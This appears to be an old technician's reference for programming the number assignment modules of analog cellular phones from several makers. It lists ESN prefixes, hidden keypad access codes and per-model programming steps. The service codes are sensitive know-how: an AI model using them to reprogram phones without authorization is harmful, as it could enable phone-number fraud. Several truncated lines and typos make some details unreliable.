 ESN, S/N Match Required:  Yes
      Available Channels:  832

    Programming Sequence:  Power On
                           After phone initialized, press 4 key and 6 key
                            simultaneously, then release.
                           Enter 10-digit password XXXXXXXXXX
                            0008693428 or 10-digit code programmed by
                            previous technician (enter within 20 seconds)
                           ESN and Software version will be displayed
                           Press 0 + 0 to initialize transceiver
                           Enter step number (1-9) then enter data
                           Press STO to enter each step
                           Press FUNC and phone reverts to "Press 1-9"
                           CLR key corrects data before STO is pressed
                           To program 2nd NAM, press * when phone displays
                            "Press 1-9" (this repeats steps 3-5)
                           Press CLR + CLR to write data in NAM

                        # digits
           Mobile Number:  10    XXX-XXX-XXXX + STO + FUNC
        System ID Format:  5     XXXXX + STO + FUNC
  Initial Paging Channel:  3     XXX + STO + FUNC
   Access Overload Class:  2     XX + STO + FUNC
               Lock Code:  4     XXXX + STO + FUNC
         Group ID Format:  2     XX + STO + FUNC
           Station Class:  4     1000 + STO + FUNC
                 (Enter Station class in binary - 1000 binary, 08 decimal)
                 Options:  4     11X1 + STO + FUNC (see below)
           Security Code:  6     XXXXXX + STO + FUNC

Press CLR + CLR to write data in NAM

                 Options:  0 (Disable)
                           1 (Enable)
                             MIN Option
                             Local Use
                             Audio mute

         New Unlock Code:  NAM
           System Select:  FUNC + 3 + 3 + 3, etc. (to scroll choices)
                            SCN AB
                            SCN BA
                            SCN A
                            SCN B
                            SCN Ho (Home)
                            SID NO. (Enter System ID #)

Press STO to enter selection

                        CINCINATTI MICROWAVE portable
Not handset programmable from the factory. The phone can be sent for
modification to CINCINNATTI MICROWAVE to be handset programmable. Call
1-800-247-4300 for instructions and cost.

After phone has been factory modified to accept handset programming, use
MOTOROLA ULTRA CLASSIC programming instructions. Place the phone in a manual
test mode to read the existing 6-digit security code necessary for keypad

This has dual NAM capability. To toggle between NAM's press RCL + # + STO.

                             CITICOMM MM1000
                NAM Type:  EEPROM
            Manufacturer:  Citicomm
              Programmer:  Keypad with cradle jumper installed
          ESN Prefix DEC:  163
                     HEX:  A3
 ESN, S/N Match Required:  Yes
      Available Channels:  832

    Programming Sequence:  Open cradle and insert a jumper wire from
                            contact #8 to contact #10 on cradle
                            PC board (see schematic next page)
                           Power On
                           Press * + * + # + # + FCN + STO (within 10 seconds
                            to enter program mode)
                           Enter NAM option 0, 1 or 2
                            0  NAM 1 only (lock out NAM 2)
                            1  Program NAM 1
                            2  Program NAM 2
                           Enter parameter for each step then press STO to
                            store increment
                           CLR key corrects data before STO is pressed
                           Press SEND to write data in NAM

        System ID Format:  5     XXXXX + STO
        Local Use Option:  1     1 + STO
              MIN Option:  1     1 + STO
           Mobile Number:  10    XXX-XXX-XXXX + STO
           Station Class:  2     08 + STO
  Initial Paging Channel:  4     0333 or 0334 + STO
   Access Overload Class:  2     XX + STO
        Preferred System:  1     0(B) or 1(A) + STO
         Group ID Format:  2     XX + STO

Press SEND to write data in NAM.

         New Unlock Code:  Current 4-digit unlock code + FCN + 0
                            + new 4-digit unlock code
           System Select:  4-digit unlock code + FCN + * + * + *,
                            etc. (the following options will be
                            displayed) + STO (to enter selection)

                            CLARION 1100 CT
                NAM Type:  Tri-State
            Manufacturer:  Clarion
              Programmer:  Motorola 1801 -- Celnam, Curtis or Bytek
          ESN Prefix DEC:  140
                     HEX:  8C
 ESN, S/N Match Required:  No
    Programmable Handset:  No
      Available Channels:  832

     Phone Number Format:  XXX-XXX-XXXX
        Lock Code Format:  XXX

              MIN Option:  Enabled
        Repertory Option:  Enabled
        Handsfree Option:  Enabled or Disabled
        Local Use Option:  Enabled
   End-to-End Signalling:  Enabled
       Horn Alert Option:  Enabled

        System ID Format:  XXXXX
        Preferred System:  A or B
   Access Overload Class:  XX
         Group ID Format:  XX

  Initial Paging Channel:  333 or 334
           Station Class:  08

              Horn Alert:  L/H + HORN/# (simultaneously)
         New Unlock Code:  NAM
           System Select:  FUNC + 2 + 0 + SRCH + SRCH +
                            SRCH (to scroll)
                           (one of the following will appear)
                            Standard  (AB or BA)
                            Invert  (BA or AB)
                            Roam  (A only or B only)

Press STO to enter selection

                             CLARION 3000 CT
                NAM Type:  EEPROM
            Manufacturer:  Clarion
              Programmer:  Handset
          ESN Prefix DEC:  166
                     HEX:  A6
 ESN, S/N Match Required:  Yes
      Available Channels:  832

    Programming Sequence:  Power On (Err 3 may be displayed if
                            phone has not been programmed)
                           Press CLR + * + * + 123123 + # + # (within 10
                           0 will be displayed
                           Select NAM 1 thru 3 by entering 1, 2 or 3
                           Press RCL + step number + enter new information
                            + STO (for each step)
                           (To enter unlock code 123; RCL + ) + 123 + STO)
                           Power OFF to exit program mode

             Unlock Code:  3or4  XXX or XXXX + STO
        System ID Format:  5     XXXXX + STO
        Local Use Option:  1     1 + STO
              MIN Option:  1     1 + STO
           Mobile Number:  10    XXX-XXX-XXXX + STO
           Station Class:  2     08 + STO
  Initial Paging Channel:  3     333 or 334 + STO
   Access Overload Class:  2     XX + STO
        Preferred System:  1     1(A) or 0(B) + STO
         Group Id Format:  2     XX + STO

Power OFF to exit program mode.

                        CLARION 5100CT and 5200CT
                NAM Type:  EEPROM
            Manufacturer:  Clarion
              Programmer:  Keypad
          ESN Prefix DEC:  166
                     HEX:  A6
 ESN, S/N Match Required:  Yes
    Stamped Model Number:  None (handset is labeled 5100CT or 5200CT)
      Available Channels:  832

    Programming Sequence:  Power On (Err 3 may be displayed if
                            phone has not been programmed)
                           Press CLR + * + * + 123123 + # + # (within 10
                           0 will be displayed
                           Select NAM 1 thru 3 by entering 1, 2 or 3
                           Press RCL + step number + enter new information
                            + STO (for each step)
                           (to enter station class; RCL + 5 + 08 + STO)
                           Power OFF to exit program mode

             Unlock Code:  3or4  XXX or XXXX + STO
        System ID Format:  5     XXXXX + STO
        Local Use Option:  1     1 + STO
              MIN Option:  1     1 + STO
           Mobile Number:  10    XXX-XXX-XXXX + STO
           Station Class:  2     08 + STO
  Initial Paging Channel:  3     333 or 334 + STO
   Access Overload Class:  2     XX + STO
        Preferred System:  1     1(A) or 0(B) + STO
         Group ID Format:  2     XX + STO

Power OFF to exit program mode.

             Display ESN:  FCN + 6
              Horn Alert:  FCN + 8 + "+ or -"
         New Unlock Code:  NAM
           System Select:  FCN + 4 + "+ or -" (to scroll choices) + STO

                 CMTELECOM AR 3800 mobile/transportable
                NAM Type:  EEPROM
            Manufacturer:  CMTELECOM
          ESN Prefix DEC:  153
                     HEX:  99
ESN, Serial Number Match:  yes

    Programming Sequence:
                           Power ON
                           Lock Phone: FUNC + 1 + 1 (press 1 until "F-Lock"
                            displays) + SND
          Enter Password:  * + 5965 ("Conf 3800" will display, else enter
                            Password * + 0188)
                           Press VOL UP or DOWN keys to increment steps
                           RCL + 2 digit step # to reach specific parameters
                           SND must be pressed to save info after each step
                           To store complete NAM info press END

     Step            # of digits
      1 Mobile Number 1:  10    XXX-XXX-XXXX + SND + VOL UP
          2 System ID 1:  5     XXXXX + SND + VOL UP
    3 Init. paging ch 1:  3     333 or 334 + SND + VOL UP
    4 Access Overload 1:  2     XX + SND + VOL UP
           5 Group ID 1:  2     XX + SND + VOL UP
          6 Local Use 1:  1    1(SND to toggle) + VOL UP
      7 System Select 1:  1     0 = 0 + SND + VOL UP
                                1 = BA + SND + VOL UP
                                2 = A only + SND + VOL UP
                                3 = B only + SND + VOL UP
                                4 = Home + SND + VOL UP
         8,9 Not Used  (VOL UP)
     10 Mobile Number 2:  10    XXX-XXX-XXXX + SND + VOL UP
         11 System ID 2:  5     XXXXX + SND + VOL UP
  12 Init pagin Channel:  3     333 or 334 + SND + VOL UP
   13 Access Overload 2:  2     XX + SND + VOL UP
          14 Group ID 2:  2     XX + SND + VOL UP
         15 Local use 2:  1     1 (SND to toggle) + VOL UP
     16 System Select 2:  1     0 = AB + SND + VOL UP
                                1 = BA + SND + VOL UP
                                2 = A Only + SND + VOL UP
                                3 = B Only + SND + VOL UP
                                4 = Home + SND + VOL UP
          17 Future Use:  1     0 + SND + VOL UP
          18 Power Save:  1     0(Dis) or 1(Enable) + SND + VOL UP
           19 System ID:  5     XXXXX + SND + VOL UP
       20 Prog Password:  5     Leave at Factory Set Number + VOL UP

             Horn Alert:  FUNC + 4 + SND
        New Unlock Code:  NAM
         System Seltect:  FUNC + (ALPHA to scroll)
                          PrefA AB
                          PrefB BA
                          Only A
                          Only B
                          Only H Home

SND to enter selection
CLR to exit

         DIAMONDTEL (MITSUBISHI) MESA 52 and 55 (Handset Programming)
                NAM Type:  Tri-State
              Manufacter:  Mitsubishi
              Programmer:  Handset (phone can also be porgrammed with NAM,
                            see MESA 40, 50, 52 and 55 programming)
          ESN Prefix DEC:  134
                     Hex:  86
 ESN, S/N Match Required:  Yes
      Available Channels:  666

    Programming Sequence:  Power On (hold for 1 second)
                           Depress and hold CLR while keying 1951426 or
                            8291112 (if phone has been porgrammed 3
                            times) must be entered within 10 seconds
                           Press SEND to enter data and increment
                           CLR may be used to correct an entry
                           Write NAM information with END key

           Mobile Number:  10    XXX-XXX-XXXX + SEND
           Security Code:  3     XXX + SEND
        System ID Format:  5     XXXXX + SEND
        Local Use Option:  1     1 + SEND
              MIN Option:  1     1 + SEND
  Initial Paging Channel:  4     0333 oe 334 + SEND
   Access Overload Class:  2     XX + SEND
        Preferred System:  1     0 (B) or 1 (A) + SEND
         Group ID Format:  2     XX + SEND
   End-to-End Signalling:  1     1 + SEND
        Handsfree Option:  1     1 (if equipped) + SEND
            Roam Inhibit:  1     0 or 1 + SEND
             Aux Option1:  2     00 to 07 + SEND (see bottom)
             Aux Option2:  2     00 ro 07 + SEND (see bottom)

Aux Option1

    Second     Non-Resettable Extended      DTMF
    Handset    Cumulative Timer
01    x               x
02                    x
03    x               x
04                                           x
05    x                                      x
06                    x                      x
07    x               x                      x

Aux Option2

    Cumulative Timer
00  60 seconds
01  30 seconds
02  20 seconds
03  15 seconds
04  12 seconds
05  10 seconds
06  6 seconds
07  1 second

              Horn Alert:  FCN + 4
         New Unlock Code:  FCN + 1 + 3-digit security code (current
                            unlock code will appear) + new 3-digit
                            unlock code + CLR
           System Select:  FCN + # + # + #, etc. (the following
                            will be displayed):
                                  Pref A
                                  Pref B
                                  Only A
                                  Only B
                                  H Only

Press CLR to enter selection and exit.

        DIAMONDTEL (MITSUBISHI) MESA 40, 50, 51 and 55 (NAM Program)
                NAM Type:  Tri-State
            Manufacturer:  Mitsubishi
              Programmer:  Motorola 1801 -- Celnam, Curtis, or
                           Handset (51 and 55 only)
          ESN Prefix DEC:  134
                     HEX:  86
 ESN, S/N Match Required:  No
    Programmable Handset:  52 and 55 only
      Available Channels:  666

     Phone Number Format:  XXX-XXX-XXXX
        Lock Code Format:  XXX
              MIN Option:  Enabled
        Repertory Option:  Enabled
        Handsfree Option:  Disabled
        Local Use Option:  Enabled
   End-to-End Signalling:  Enabled
       Horn Alert option:  Enabled
        System ID Format:  XXXXX
        Preferred System:  A or B
   Access Overload Class:  XX
         Group ID Format:  XX
  Initial Paging Channel:  333 or 334
           Station Class:  00
              Horn Alert:  FCN + 4
         New Unlock Code:  FCN + 1 + 3-digit security
                            code (current Unlock Code will appear)
                            + new 3-digit Unlock Code + CLR
           System Select: STO + # + # + # etc..
                           (one of the following will appear)
                                 AAABBB or BBBAAA   Standard
                                 BBBAAA or AAABBB   Alternate
                                 C50A               Home A only
                                 C50B               Home B only
                                 AAAAAA             A only
                                 BBBBBB             B only

Press CLR to enter selection and exit.

                   DIAMONDTEL MESA 60, 60X and 80X portable
                NAM Type:  EEPROM
            Manufacturer:  Mitsubishi
              Programmer:  Handset
          ESN Prefix DEC:  134
                     HEX:  86
 ESN, S/M Match Required:  No
     Programmble Handset:  Yes
      Available Channels:  666

    Programming Sequence:  Power On (END/FCN + 0, simultaneously)
                            Hold CLR and enter 6926232 (within 10 seconds)
                            Enter step infomation then press SND
                            Press END to write NAM infomation

           Mobile Number:  10    XXX-XXX-XXXX
           Security Code:  4     XXXX
        System ID Format:  5     XXXXX
        Local Use Option:  1     1
              MIN Option:  1     1
  Initial Paging Channel:  3     333 or 334
   Access Overload Class:  2     XX
        Preferred System:  1     0 (B) or 1 (A)
         Group ID Format:  2     XX
   End-to-End Signalling:  1     1
            Roam Inhibit:  1     0
          A/B Selectable:  1     1
               Auto Lock:  1     0
                     Aux:  1     0

         New Unlock Code:  FCN + STO + 4-digit security code (NAM)
                            + new 3-digit unlock code
           System Select:  FCN + 1 + X
                                 X=0  AB or BA Standard
                                 X=1  BA or AB Alternate
                                 X=2  Home
                                 X=3  Pref Only
                                 X=4  Non-Pref Only

                    DIAMONDTEL MESA 90X and 99X portables
                NAM Type:  EEPROM
            Manufacturer:  Mitsubishi
              Programmer:  Handset

          ESN Prefix DEC:  134
                     HEX:  86
 ESN, S/N Match Required:  No
    Programmable Handset:  Yes

    Programming Sequence:  Power On
                           Depress and hold END while inputting 5132920
                            or 6972814 (must be input within 10
                           Enter information for each step then press
                           SEND to increment
                           Press END to write NAM infomation

             Dual Number:  1    0 (1 number) or 1 (2 numbers) + SEND
           Mobile Number:  10   XXX-XXX-XXXX + SEND
        System ID Format:  5    XXXXX + SEND
        Local Use Option:  1    1 + SEND
              MIN Option:  1    1 + SEND
  Initial Paging Channel:  4    333 or 334 + SEND
   Access Overload Class:  2    XX + SEND
        Preferred System:  1    0 (B) or 1 (A) + SEND
         Group ID Format:  2    XX + SEND
            Roam Inhibit:  1    0 + SEND
               VOX (DTX):  1    (0 or 1) + SEND
         2 Mobile Number:  10   XXX-XXX-XXXX + SEND
      2 System ID Format:  5    XXXXX + SEND
      2 Local Use Option:  1    1 + SEND
            2 MIN Option:  1    1 + SEND
2 Initial Paging Channel:  4    0333 or 0334 + SEND
 2 Access Overload Class:  2    XX + SEND
      2 Preferred System:  1    0 (B) or 1 (A) + SEND
       2 Group ID Format:  2    XX + SEND
          2 Roam Inhibit:  1    (0 or 1) + SEND
             2 VOX (DTX):  1    (0 or 1) + SEND
            2 Auto Retry:  1    (0 or 1) + SEND
           Security Code:  4    XXXX + SEND
   End-to-End Signalling:  1    1 + SEND
         Continuous DTMF:  1    (0 or 1) + SEND
               Auto Lock:  1    (0 or 1)  SEND
                 Booster:  1    0 + SEND
           Audible Timer:  1    (0 or 1) + SEND

Press END to exit program mode.

                 DIAMONDTEL MESA 92 transportable/portable
                NAM Type:  EEPROM
            Manufacturer:  Mitsubishi
              Programmer:  Handset
          ESN Prefix DEC:  134
                     HEX:  86
 ESN, S/N Match Required:  No
        Stamped Model # :  1st 2 digits of serial # are 92
    Programmable Handset:  Yes
      Avialable Channels:  832

    Programming Sequence:  Power On
                           Depress and hold END while inputting 1951426 or
                            8291112 (if phone has been programmed 3x)
                            enter within 10 seconds
                           Enter infomation for each step then press SEND
                            to increment
                           Press END to write NAM information

                        # of digits
             Dual Number:  1    0 (1 number) or 1 (2 numbers) + SEND
           Mobile Number: 10    XXX-XXX-XXXX + SEND
        System ID Format:  5    XXXXX + SEND
        Local Use Option:  1    1 + SEND
              MIN Option:  1    1 + SEND
  Initial Paging Channel:  4    0333 or 0334 + SEND
   Access Overload Class:  2    XX + SEND
         Group ID Format:  2    XX + SEND
         Timer increment:  1    0 + SEND
 (if Dual Number was 0 then skip 2nd programming sequence)
         2 Mobile Number:  10   XXX-XXX-XXXX + SEND
      2 System ID Format:  5    XXXXX + SEND
      2 Local Use Option:  1    1 + SEND
            2 MIN Option:  1    1 + SEND
2 Initial Paging Channel:  4    0333 or 0334 + SEND
 2 Access Overload Class:  2    XX + SEND
       2 Group ID Format:  2    XX + SEND
       2 Timer increment:  1    0 + SEND
           Security Code:  4    XXXX + SEND
                     VOX:  1    (0 or 1) + SEND
            Roam Inhibit:  1    (0 or 1) + SEND
          Continous Tone:  1    (0 or 1) + SEND
      Disable Cumulative:  1    (0 or 1) + SEND
  Disable ignition sense:  1    (0 or 1) + SEND
   Disable own # display:  1    (0 or 1) + SEND
             SID Lockout:  1    (0 or 1) + SEND
            Dual Handset:  1    (0 or 1) + SEND
             RJ11 Option:  1    (0 or 1) + SEND

Press END to exit Program mode.

         New Unlock Code:  FCN + 7 + 4-digit security
                            code (NAM) + new 3-digit unlock code
           System Select:  FCN + 1 + x
                                 X=0  AB or BA Standard
                                 X=1  BA or AB Alternate
                                 X=2  Home
                                 X=3  Pref only
                                 X=4  Non-Pref only

Press CLR to exit.

                       DIAMONDTEL MESA 95 transportable
                NAM Type:  EEPROM
            Manufacturer:  Mitsubishi
              Programmer:  Handset
          ESN Prefix DEC:  134
                     HEX:  86
 ESN, S/N Match Required:  No
    Programmable Handset:  Yes
      Available Channels:  832

    Programming Sequence:  Power On
                           Depress and hold END while inputting 1951426 or
                            8291112 (if phone has been programmed 3x)
                           Enter information for each step then press SEND
                            to increment
                           Press END to write NAM information

                       # of digits
             Dual number:  1    0 (1 number) or 1 (2 numbers) + SEND
           Mobile Number:  10    XXX-XXX-XXXX + SEND
        System ID Format:  5    XXXXX + SEND
        Local Use Option:  1    1 + SEND
              MIN Option:  1    1 + SEND
  Initial Paging Channel:  4    0333 or 0334 + SEND
   Access Overload Class:  2    XX + SEND
      Preferred System 1:  1    (0) B or 1 (A) + SEND
         Group ID Format:  2    XX + SEND
         Timer Increment:  1    0 (0-7) + SEND
(if Dual Number was 0 then skip 2nd NAM programming)
         2 Mobile Number:  10   XXX-XXX-XXXX + SEND
      2 System ID Format:  5    XXXXX + SEND
      2 Local Use Option:  1    1 + SEND
            2 MIN Option:  1    1 + SEND
2 Initial Paging Channel:  4    0333 or 0334 + SEND
 2 Access Overload Class:  2    XX + SEND
      2 Preferred System:  1    0(B) or 1(A) + SEND
       2 Group ID Format:  2    XX + SEND
       2 Timer increment:  2    0(0-7) + SEND
           Security code:  4    XXXX + SEND
    End-to-End Signaling:  1    1 + SEND
                     VOX:  1    0 (0 or 1) + SEND
               Handsfree:  1    0 (0 or 1) + SEND
            Roam Inhibit:  1    0 (0 or 1) + SEND
         Continuous Tone:  1    0 (0 or 1) + SEND
      Disable Cumulative:  1    0 (0 or 1) + SEND
  Disable Ignition sense:  1    0 (0 or 1) + SEND
            Dual Handset:  1    0 (0 or 1) + SEND

         New Unlock Code:  FCN + 1 + 4-digit security code (NAM)
                            + new 3-digit unlock code + CLR
            Syetm Select:  FCN + # + # (press CLR to select)

                             FUJITSU F80M-360
                NAM Type:  Fujitsu (PROM)
            Manufacturer:  Fujitsu
              Programmer:  Curtis or Bytek
          ESN Prefix DEC:  133
                     HEX:  85
 ESN, S/N Match Required:  Yes
    Programmable Handset:  No
      Available Channels:  666

     Phone Number Format:  XXX-XXX-XXXX
        Lock Code Format:  XXX
        System ID Format:  XXXXX
       Horn Alert Option:  1
        Handsfree Option:  0 (disable) or 1 (enable)
   End-to-End Signalling:  1
        Repertory Option:  1
         Group ID Format:  XX
   Access Overload Class:  XX
           Station Class:  00
               Local Use:  1
              MIN Option:  1
  Initial Paging Channel:  333 or 334
        Preferred System:  0 (B) or 1 (A)

Determine software version from IC 2 on logic board befroe setting the option
bits. Last three digits on the PROM will be 003 or 004 to indicate the software

Option Bits for Hex Address 13

   Bit       Curtis       Software           Software
Location    Location      Version 003        Version 004
   B0          37         Call in absence    Call in Absence
   B1          38         Expanded Memory    Lock Feature
                                 (00-39)        Bit-A
   B2          39         DTMF from memory   Lock Feature
                           Locations (30-39)    Bit-B
   B3          40         System Select      Not used
   B4          41         Not used           Expanded memory (00-39)
   B5          42         Not used           DTMF from memory
                                              Location (30-39)
   B6          43         Not used           Call Timer Bit A
   B7          44         Not used           Call Timer Bit B

Lock Feature                     Call timer
Bit A   Bit B                    Bit A   Bit B
  0       0     Outgoing           0       0      6 seconds
  0       1     Incoming           0       1     15 seconds
  1       0     Auto Outgoing      1       0     30 seconds
  1       1     Auto Incoming      1       1     60 seconds

               FUJITSU 362 (COMMANDER) and 362A (COMMANDER II)
                NAM Type:  Fujitsu
            Manufacturer:  Fujitsu
              Programmer:  Curtis or Bytek
          ESN Prefix DEC:  133
                     HEX:  85
 ESN, S/N Match Required:  Yes
    Programmable Handset:  No
      Available Channels:  666

     Phone Number Format:  XXX-XXX-XXXX
        Lock Code Format:  XXX or XXXX
        System ID Format:  XXXX

       Horn Alert Option:  1
        Handsfree Option:  0 (Enabled from handset)
   End-to-End Signalling:  1
        Repertory Option:  1

         Group ID Format:  XX
   Access Overload Class:  XX
           Station Class:  0000

        Local Use Option:  1
              MIN Option:  1

  Initial Paging Channel:  333 or 334
        Preferred System:  1 (A) or 0 (B)

              Horn Alert:  F + # (Aux)
         New Unlock Code:  NAM
           System Select:  F + 1 + X
                            X=1 (A then B)
                            X=2 (B then A)
                            X=3 (A Only)
                            X=4 (B Only)
                            X=5 (home)

                FUJITSU 364 (COMMANDER IIX) and 170 portable
                NAM Type:  EEPROM
            Manufacturer:  Fujitsu
              Programmer:  Handset
          ESN Prefix DEC:  133
                     HEX:  85
 ESN, S/N Match Required:  Yes (manufacturer prefix + last 4 or 5 digits)
    Programmable Handset:  Yes
      Available Channels:  832

    Programming Sequence:  Power On
                           F + LOCK
                           Power Off
                           Power On
                           # + 626 + # + 7764726 (within 10 seconds)
                           Hold * key until tone stops
                           Enter data for each step then press STOR
                           Press SEND to write data

                       # of digits
        System ID Format:  5    XXXXX
        Local Use Option:  1    1
              MIN Option:  1    1
           Mobile Number:  10   XXX-XXX-XXXX
           Station Class:  2    08 (mobile) 14 (portable)
  Initial Paging Channel:  3     333 or 334
   Access Overload Class:  2    XX
        Preferred System:  1    1 (A) or 0 (B)
         Group ID Format:  2    XX
                    Lock:  3 or 4
              Call Timer:  1    4
               Auto Lock:  1    1
        Call Restriction:  1    1

Call Timer - 1  Timer Off
             2  6-seconds
             3  30-seconds
             4  60-seconds

Auto Lock - 1  Manual lock, no out
            2  Manual lock, no calls
            3  Auto lock, no out
            4  Auto lock, no calls

Call Restriction - 1  No restriction
                   2  No memory dialing
                   3  No long-distance
                   4  Both 2 and 3
                   5  memory calls only

Programming steps for NAMs 2 thru 4: Power On
                                     Unlock phone (if locked)
                                     F + 7 + (NAM 2, 3 or 4)
                                     F + LOCK
                                     Power Off
                                     Power On
                                     Follow programming code and steps from

   Horn alert (364 only):  F + #/AUX
         New Unlock Code:  NAM
           System Select:  F + 1 + X
                            X=1 AB Pref A
                            X=2 BA Pref B
                            X=3 A Only
                            X=4 B Only
                            X=5 Home

To confirm setting, press RCL + F + X

                  FUJITSU 364A (ST, LT, FX, DX, and XL)
                NAM Type:  EEPROM
            Manufacturer:  Fujitsu
              Programmer:  Handset
          ESN Prefix DEC:  133
                     HEX:  85
 ESN, S/N Match Required:  Yes
    Programmable Handset:  Yes
      Available Channels:  832
    Programming Sequence:  Power On
                           F + LOCK
                           Power Off
                           Power On
                           # + 626 + # + 7764726 (within 10 seconds)
                           Hold * key until tone stops
                           Enter data for each step then press STOR
                           Vol UP or DN arrows can be used to scroll
                           Press SEND to write data

                       # of digits
        System ID Format:  5    XXXXX
        Local Use Option:  1    1
              Min Option:  1    1
           Mobile Number:  10   XXX-XXX-XXXX
           Station Class:  2    08 (mobile) 14 (portable)
  Initial Paging Channel:  3    333 or 334
   Access Overload Class:  2    XX
        Preferred System:  1    1 (A) or 0 (B)
         Group ID Format:  2    XX
             Unlock Code:  3 or 4
              Call Timer:  1    4
        Call Restriction:  1    1
     System ID Inhibit #:  5    XXXXX
     System ID Inhibit #:  5    XXXXX
     System ID Inhibit #:  5    XXXXX

Call Timer Increment - 1  Timer Off
                       2  6-seconds
                       3  30-seconds
                       4  60-seconds

Auto Lock - 1  Manual Lock, no out
            2  Manual Lock, no calls
            3  Auto Lock, no out
            4  Auto Lock, no calls

Call Restriction - 1  No restriction
                   2  No memory dialing
                   3  No long-distance
                   4  Both 2 and 3
                   5  Memory calls only

Programming Instructions NAMs 2 thru 4:  Power On
                                         Unlock phone (if locked)
                                         F + 7 + (NAM 2, 3, or 4)
                                         F + LOCK
                                         Power Off
                                         Power On
                                         Follow programming code from above

              Horn alert:  F + #
         New Unlock Code:  NAM
           System Select:  F + 1 + X
                            X=1  AB Pref A
                            X=2  BA Pref B
                            X=3  A only
                            X=4  B only
                            X=5  Home

To confirm setting, press RECL + F + X

                          FUJITSU Pocket Commander
                NAM Type:  EEPROM
            Manufacturer:  Fujitsu
              Programmer:  Handset
          ESN Prefix DEC:  133
                     HEX:  85
 ESN, S/N Match Required:  Yes
    Stamped Model number:  F80P-171
      Available Channels:  832
    Programming Sequence:  Power On
                           F + LOCK
                           Power Off
                           Power On
                           # + 626 + # + 7764726 (within 10 seconds)
                           Hold * key until tone stops
                           Enter data for each step then press STOR
                           Vol UP or DN arrows can be used to scroll
                           Press SEND to write data

                       # of digits
        System ID Format:  5    XXXXX
        Local Use Option:  1    1
              MIN Option:  1    1
           Mobile Number:  10   XXX-XXX-XXXX
           Station Class:  2    08 (mobile) or 14 (portable)
  Initial Paging Channel:  3    333 or 334
   Access Overload Class:  2    XX
        Preferred System:  1    1 (A) or 0 (B)
         Group ID Format:  2    XX
             Unlock Code:  3 or 4
              Call Timer:  1    4
        Call Restriction:  1    1
        System ID Search:  5    XXXXX
     System ID Inhibit #:  5    XXXXX

Call Timer Increment - 1  Timer Off
                       2  6 seconds
                       3  30 seconds
                       4  60 seconds

Auto Lock - 1  Manual Lock, no out
            2  Manual Lock, no calls
            3  Auto Lock, no out
            4  Auto Lock, no calls

Call Restriction - 1  No restriction
                   2  No memory dialing
                   3  No long-distance
                   4  Both 2 and 3
                   5  Memory calls only

Programming instructions NAMs 2 thru 4:  Power On
                                         Unlock phone (if locked)
                                         F + 7 + (NAM 2, 3 or 4)
                                         F + LOCK
                                         Power Off
                                         Power On
                                         Follow programming code from above

              Horn Alert:  F + #
         New Unlock Code:  NAM
           System Select:  F + 1 + X
                            X=1  AB Pref A
                            X=2  BA Pref B
                            X=3  A only
                            X=4  B only
                            X=5  Home

To confirm setting, press RECL + F + X

                          GATEWAY CP900 portable
                NAM Type:  EEPROM
            Manufacturer:  Gateway
              Programmer:  Keypad
          ESN Prefix DEC:  147
                     HEX:  93
 ESN, S/N Match Required:  Yes
    Stamped Model Number:  CP900
      Available Channels:  832

    Programming Sequence:  Power Off
                           Power On
                           Press MENU ("Enter Number" will be displayed)
                           Enter 0 + 9 (ON or OFF will be displayed)
                           Select NAM 1 or 2:  OFF - NAM 1
                                                ON - NAM 2
                           Press VOL UP or DOWN to toggle choices
                           Press CLR
                           Press MENU + 9 + 9 + current unlock code
                            (factory preset 9999)
                            PROGRAM NAM will be displayed
                           Enter each parameter then press SEND/ANSWER to
                           Once the last step in entered and SEND/ANSWER is
                            pressed, the phone is automatically programmed
                           END may be pressed at any time to exit
                            changing the data

                       # of digits
        System ID Format:  6    XXXXXX + SEND/ANSWER
           Mobile Number:  10   XXX-XXX-XXXX + SEND/ANSWER
  Initial Paging Channel:  4    0333 or 0334 + SEND/ANSWER
   Access Overload Class:  2    XX + SEND/ANSWER
         Group ID Format:  2    XX + SEND/ANSWER
              MIN Option:  1    1 + SEND/ANSWER
        Local Use Option:  1    1 + SEND/ANSWER
           System Select:  1    1 (A) or 2 (B) + SEND/ANSWER

Phone is programmed when the final step is entered

         New Unlock Code:  MENU + 0 + 5 + current 4-digit unlock
                            code + new 4-digit unlock code + CLR
           System Select:  MENU + 0 + 8 + VOL UP or DOWN (to scroll
                                 A only
                                 B only

Press CLR to exit.

    GE CF1000, CF2000, 3000 series, 4000 series, EXECUTIVE XR & MONOGRAM XR
                NAM Type:  EEPROM
            Manufacturer:  GE
              Programmer:  Handset
          ESN Prefix DEC:  146
                     HEX:  92
 ESN, S/N Match Required:  Yes
    Programmable Handset:  Yes
      Available Channels:  GE1000 & 2000 - 666
                           GE3000 & 4000 EXECUTIVE XR & MONOGRAM XR - 832

    Programming Sequence:  Power On
                           Hold CLR while inputting 923885 (within 10 seconds)
                           ESN will be displayed
                           Press SEND to enter data and increment
                           Press END to write NAM information

                       # of digits
           Mobile Number:  10   XXX-XXX-XXXX
             Unlock Code:  3    XXX
        System ID Format:  5    XXXXX
        Local Use Option:  1    1
              MIN Option:  1    1
  Initial Paging Channel:  3    333 or 334
   Access Overload Class:  2    XX
        Preferred System:  1    0 (B) or 1 (A)
         Group ID Format:  2    XX
              Horn Alert:  1    1
        Handsfree Option:  1    0, 1 or 2 (MONOGRAM H/F)
          Alternate Lock:  3    Don't use same code as unlock
                Dual NAM:  1    0 (1 NAM) 1 (2 NAM)

Horn Alert (if equipped):  Press and hold END key. While holding
                            END key, depress 9. On most models,
                            this feature does NOT cancel when the
                            ignition is turned on.
         New Unlock Code:  NAM
           System Select:  Press and hold END key. While holding
                            END key, depress 4. Use volume rocker
                            button to step through selections
                                  0  Pref then Non-Pref
                                  1  Pref only
                                  2  Home only
                                  3  Preferred Roam only
                                  4  Non-Pref then Pref
                                  5  Non-Pref only

Press CLR to exit.

                               GE MINI II
                NAM Type:  EEPROM
            Manufacturer:  Mitsubishi
              Programmer:  keypad
          ESN Prefix DEC:  134
                     HEX:  86
 ESN, S/N Match Required:  Yes
    Programmable Handset:  Yes
      Available Channels:  832

    Programming Sequence:  Power On
                           Depress and hold ENd while inputting 6282905
                            (enter within 10 seconds)
                           Enter information for each step then press SEND
                            to increment (CLR to correct before SEND)
                           Press END to write NAM information

                       # of digits
             Dual Number:  1    0 (1 NAM) 1 (2 NAMs) + SEND
           Mobile Number:  10   XXX-XXX-XXXX + SEND
        System ID Format:  5    XXXXX + SEND
        Local Use Option:  1    1 + SEND
              MIN Option:  1    1 + SEND
  Initial Paging Channel:  4    0333 or 0334 + SEND
   Access Overload Class:  2    XX + SEND
      Preferred system 1:  1    0 (B) or 1 (A) + SEND
         Group ID Format:  2    XX + SEND
          Roam Inhibit 1:  1    0 or 1 (normal 0)
